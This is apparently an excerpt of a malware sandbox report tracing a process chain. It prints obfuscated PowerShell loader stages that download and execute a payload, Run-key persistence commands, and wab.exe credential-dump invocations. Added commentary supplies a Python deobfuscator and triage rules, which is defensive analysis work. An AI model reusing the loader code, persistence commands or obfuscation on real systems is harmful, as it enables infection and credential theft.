KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
              Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
              Source: C:\Windows\SysWOW64\relog.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
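Both PowerShell stages above use the same string obfuscation. Every literal handed to Indbandtes (first stage) or Viscometres (second stage) is real text with two filler characters in front of each genuine one; the function assembles the method name from 'SUBsTR' + 'ing' to dodge naive string matching, increments an unset counter to 1 (the If on ${host}.CurrentUICulture is true on any normal host), and then walks the string from index 2 in steps of 3, stopping before Length-1. Sloshily / Tilfredsstillelse pass the decoded text to the command held in $Paprr / $Hemibasidiomycetes, which decodes to iex (via & in the first stage and dot-sourcing in the second). The decoder below is an added example, not part of the report or of the sample: the four SAMPLE literals are copied verbatim from the command lines above, while encode() and build_stage() are constructed here only to produce test input and are not the malware's own encoder.

```python
"""
Decoder for the string obfuscation used by the PowerShell stages above.

Indbandtes (first stage) / Viscometres (second stage) do, in effect:
    For ($i = 2; $i -lt $s.Length - 1; $i += 3) { $out += $s.Substring($i, 1) }
so every third character from index 2 is real and the rest is filler.
Sloshily / Tilfredsstillelse then pass the decoded text to the command named
in $Paprr / $Hemibasidiomycetes, which decodes to 'iex'.

Added example, not part of the Joe Sandbox report. SAMPLE holds literals
copied from the command lines above; encode() and build_stage() are
constructed here only to produce test input.
"""
import random
import re

# Literals copied verbatim from the report's command lines.
SAMPLE = {
    "Hennes": " ,UDisEpeA.rG -GgA eg ,ey.nBytB. ",  # first stage  -> User-Agent
    "Paprr": "B,iP,e hx H ",                        # first stage  -> iex
    "Jejune203": "Va>In ",                          # first stage  -> >
    "Hemibasidiomycetes": "AmiGeePrxUd ",           # second stage -> iex
}


def decode(obf: str, start: int = 2, step: int = 3) -> str:
    """Keep one character every `step` from `start`, stopping before len-1."""
    limit = len(obf) - 1  # $s.Length - $Apocrisiary; the ++ on an unset variable made it 1
    return "".join(obf[i] for i in range(start, limit, step))


def encode(plain: str, seed: int = 0, step: int = 3) -> str:
    """Inverse of decode(); constructed here to build inputs, not the sample's own encoder."""
    rng = random.Random(seed)
    filler = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ,."
    out = []
    for ch in plain:
        out.append("".join(rng.choice(filler) for _ in range(step - 1)))  # step-1 junk chars
        out.append(ch)                                                    # then the real one
    out.append(rng.choice(filler))  # trailing junk keeps the last real char below len-1
    return "".join(out)


# Matches  Indbandtes '<literal>'  or  Viscometres '<literal>'  (no doubled '' inside the quotes).
LITERAL_RE = re.compile(r"(?:Indbandtes|Viscometres)\s+'([^']*)'")


def decode_literals(cmdline: str, start: int = 2, step: int = 3) -> list:
    """Decode every obfuscated literal in a PowerShell command line, in order."""
    return [decode(m.group(1), start, step) for m in LITERAL_RE.finditer(cmdline)]


def build_stage(plains, seed: int = 7) -> str:
    """Constructed stand-in for a stage's command line, for exercising decode_literals()."""
    return ";".join(
        f"$v{i}=Indbandtes '{encode(p, seed + i)}'" for i, p in enumerate(plains)
    )


if __name__ == "__main__":
    for name, literal in SAMPLE.items():
        print(f"${name:<19} -> {decode(literal)!r}")
    stage = build_stage(["User-Agent", "iex", ">", "Invoke-WebRequest"])
    print(decode_literals(stage))
```

One caveat when applying this to the text above rather than to a raw process log: the short literals decode cleanly, but the longer ones as rendered on this page stop making sense after the first characters (for example the $Velproevet literal yields Mozilla/5.0 and then drifts off the 3-character grid), which is what collapsed runs of spaces in the rendering would produce. Decode the command line captured by Sysmon or the EDR, where the original spacing is intact.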
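Read as a tree, the entries above form a short chain that repeats once for each stage: cmd.exe starts a hidden 64-bit PowerShell, which uses cmd.exe /c echo only to resolve %appdata%, relaunches itself from SysWOW64, and starts wab.exe (Windows Mail) with no arguments; wab.exe then registers a Run-key value via REG ADD, runs a .vbs from Temp, and spawns copies of itself with /stext pointing into Temp; a separate binary under a random Program Files (x86) directory starts srdelayed.exe and relog.exe, and relog.exe opens Firefox. The Run value is REG_EXPAND_SZ, so %outoven% (and %Arrestationernes110% in the second run) is an environment variable the sample must have defined for the entry to do anything, and the stage it launches is read from a value under HKCU:\Neglective\ (HKCU:\sttyskers\) at each logon rather than stored on disk. The triage below is an added example, not part of the report: the rule names and their conditions are mine, the sample input is copied from this page with the PowerShell bodies shortened to '...', and the parser accepts both the fused 'cmd.exeProcess created:' form in which the page renders the lines and the spaced form, so the same rules can run over a Sysmon or EDR export reshaped into Source / Process created lines.

```python
"""
Triage rules for the 'Process created' evidence lines above.

Added example, not part of the Joe Sandbox report: the rules are my reading of
the chain on this page (64-bit PowerShell relaunching under SysWOW64, cmd.exe used
only to echo %appdata%, wab.exe hosting the payload and spawning shells, /stext
dumps into Temp, REG ADD to the Run key via a non-standard %variable%, a script run
from Temp, system utilities spawned from a random Program Files (x86) directory).
"""
import re
from pathlib import PureWindowsPath

# Lines copied from the report above; the two PowerShell bodies are shortened to '...'.
SAMPLE_LINES = [
    r'''Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {...}"''',
    r'''Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"''',
    r'''Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {...}"''',
    r'''Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"''',
    r'''Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"''',
    r'''Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"''',
    r'''Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"''',
    r'''Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeProcess created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"''',
    r'''Source: C:\Windows\SysWOW64\relog.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"''',
]

# Paths end in .exe, so a lazy match up to '.exe' splits parent / child / arguments even
# when the page fuses 'cmd.exeProcess created:' and when the paths contain spaces.
LINE_RE = re.compile(r"^\s*Source:\s*(.+?\.exe)\s*Process created:\s*(.+?\.exe)\s*(.*)$", re.I)
KNOWN_ENV = {"appdata", "localappdata", "programdata", "programfiles", "programfiles(x86)",
             "systemroot", "windir", "userprofile", "temp", "tmp", "comspec", "public"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "reg.exe"}
SYSUTILS = {"srdelayed.exe", "relog.exe"}  # rarely-run utilities used as hosts in this chain
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}


def parse(line: str):
    """Return (parent_path, child_path, child_cmdline) or None for non-matching lines."""
    m = LINE_RE.match(line)
    return m.groups() if m else None


def base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def has(path: str, fragment: str) -> bool:
    return fragment.lower() in path.lower()


def rule_wow64_relaunch(parent, child, args):
    if base(parent) == base(child) == "powershell.exe" and has(parent, "\\System32\\") and has(child, "\\SysWOW64\\"):
        return "64-bit PowerShell relaunching itself as 32-bit (SysWOW64)"


def rule_env_probe(parent, child, args):
    if base(parent) == "powershell.exe" and base(child) == "cmd.exe" and re.search(r'/c\s+"?echo\s+%\w+%', args, re.I):
        return "cmd.exe used only to echo an environment variable back to the script"


def rule_host_process(parent, child, args):
    if base(child) == "wab.exe" and base(parent) == "powershell.exe":
        return "wab.exe (Windows Mail) started by PowerShell: candidate injection host"
    if base(parent) == "wab.exe" and base(child) in SHELLS:
        return f"wab.exe spawning {base(child)}"


def rule_stext_dump(parent, child, args):
    m = re.search(r'/stext\s+"?([^"]+)', args, re.I)
    if m and has(m.group(1), "\\AppData\\Local\\Temp\\"):
        return "/stext output written to Temp (save-to-text flag used by credential dumpers)"


def rule_run_key(parent, child, args):
    if re.search(r"\bREG\s+ADD\b", args, re.I) and re.search(r"\\CurrentVersion\\Run\b", args, re.I):
        odd = sorted({v for v in re.findall(r"%([\w()]+)%", args) if v.lower() not in KNOWN_ENV})
        return "REG ADD to the Run key" + (f" (non-standard env var: {', '.join(odd)})" if odd else "")


def rule_script_from_temp(parent, child, args):
    if base(child) in {"wscript.exe", "cscript.exe"} and re.search(r'\\Temp\\[^"]+\.(vbs|js|wsf)\b', args, re.I):
        return "script interpreter executing a script from Temp"


def rule_sysutil_chain(parent, child, args):
    if base(child) in SYSUTILS and not has(parent, "C:\\Windows\\"):
        return f"{base(child)} started from outside C:\\Windows ({PureWindowsPath(parent).parent.name})"
    if base(parent) in SYSUTILS and base(child) in BROWSERS:
        return f"browser launched by {base(parent)}"


RULES = [rule_wow64_relaunch, rule_env_probe, rule_host_process, rule_stext_dump,
         rule_run_key, rule_script_from_temp, rule_sysutil_chain]


def triage(lines):
    """Return [(child_basename, reason)] for every rule that fires on each parsable line."""
    findings = []
    for line in lines:
        parsed = parse(line)
        if not parsed:
            continue
        parent, child, args = parsed
        findings += [(base(child), r) for r in (rule(parent, child, args) for rule in RULES) if r]
    return findings


if __name__ == "__main__":
    for child, reason in triage(SAMPLE_LINES):
        print(f"{child:<15} {reason}")
```

Each rule is deliberately narrow so that a single hit is explainable; in a real pipeline the value is in the co-occurrence, for example wab.exe as both the child of PowerShell and the parent of reg.exe within seconds, which no legitimate use of Windows Mail produces.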
              Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
